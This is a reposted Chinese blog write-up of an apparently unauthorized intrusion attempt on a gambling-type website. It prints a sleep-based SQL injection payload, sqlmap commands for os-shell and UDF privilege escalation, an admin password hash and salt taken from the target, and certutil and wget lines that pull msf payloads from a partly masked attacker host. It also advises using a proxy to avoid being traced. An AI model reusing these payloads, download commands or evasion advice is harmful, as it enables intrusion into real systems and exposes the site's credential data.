文章总结： 本文记录了一次针对存在CDN保护的站点的渗透测试过程，作者使用BurpSuite扫描发现SQL和JAVA注入点，通过sqlmap进行数据库探测和UDF提权尝试，但未成功获取系统权限。文章包含具体技术操作步骤如DNS外带数据回显和msf反弹shell尝试，最终虽未突破防线但提供了实战中的技术思路与工具使用方法。 综合评分： 58 文章分类： 渗透测试,WEB安全,实战经验,漏洞分析,红队

巧用BP渗透BC

安锐信安全攻防实验室

2026年4月13日 20:23 湖南

在小说阅读器读本章

去阅读

以下文章来源于F5安全团队 ，作者江南F5安全团队

F5安全团队 .

单丝不成线，独木不成林.

本公众号“F5安全团队”仅分享网络安全领域的相关知识，仅限于学习，不得用于非法活动，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

一，前言

今天又是个愉快的一天，本来还吃着晚饭呢，突然小学妹给我发消息了，我直接就是起立了

学妹的诱惑，我根本扛不住，必须开搞！

在从食堂回老巢的路上，我都在幻想，小学妹嘿嘿嘿,大家都懂，嘻嘻~

二，渗透过程

通过全球ping发现此站点存在CDN无法绕过，于是从web点入手

通过burp的主动扫描模块扫出站点存在SQL和JAVA(dom)注入

检测到vist_num存在注入点

通过报错提升这里可能存在延时注入

技术参考文章：http://www.taodudu.cc/news/show-1538666.html?action=onClick

但是尝试了各种手法最终还是没有绕过

bp主动扫描跑出来的第三次的请求：visit_num=(select*from(select(sleep(20)))a);，探测一下waf的种类，是一款国外云的waf，尝试绕过

sqlmap走你老弟!

python sqlmap.py -r 1.txt –level 3 –risk 5 –dbs –delay –dbms=mysql

admin 0ff22ae5a245eda021f965c58f8b2136 vXT9Wu（加盐了）

udf提权直接–os-shell获得系统权限了（但是没有提到system）

这里应该是调用了sys_eval和sys_exec的函数进行了udf提权（还是没有成功）

不知道为啥执行了命令不回显，估计没有权限

–priv-esc 尝试提升权限

直接上传无果，权限不足

–current-user查看当前数据库权限，我就说，难怪

尝试DNS外带数据回显，这也没有用

https://cn-sec.com/archives/504769.html（可借鉴）

sqlmap反弹shell到msf

windows：certutil.exe --urlcache --splist -f http://4*.***.***.*5:8081/msf.exe '\www\wwwroot\msf.exe'
linux：wget http://4*.***.***.*5:8081/msf.elf '\www\wwwroot\msf.elf'

前提开好代理防止本地物理机被溯源

msf开监听

最后还是没拿到shell，让小学妹失望了

最终：学妹wx还是拿到了，嘿嘿，拜拜，找学妹去咯~~!

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安锐信安全攻防实验室 《巧用BP渗透BC》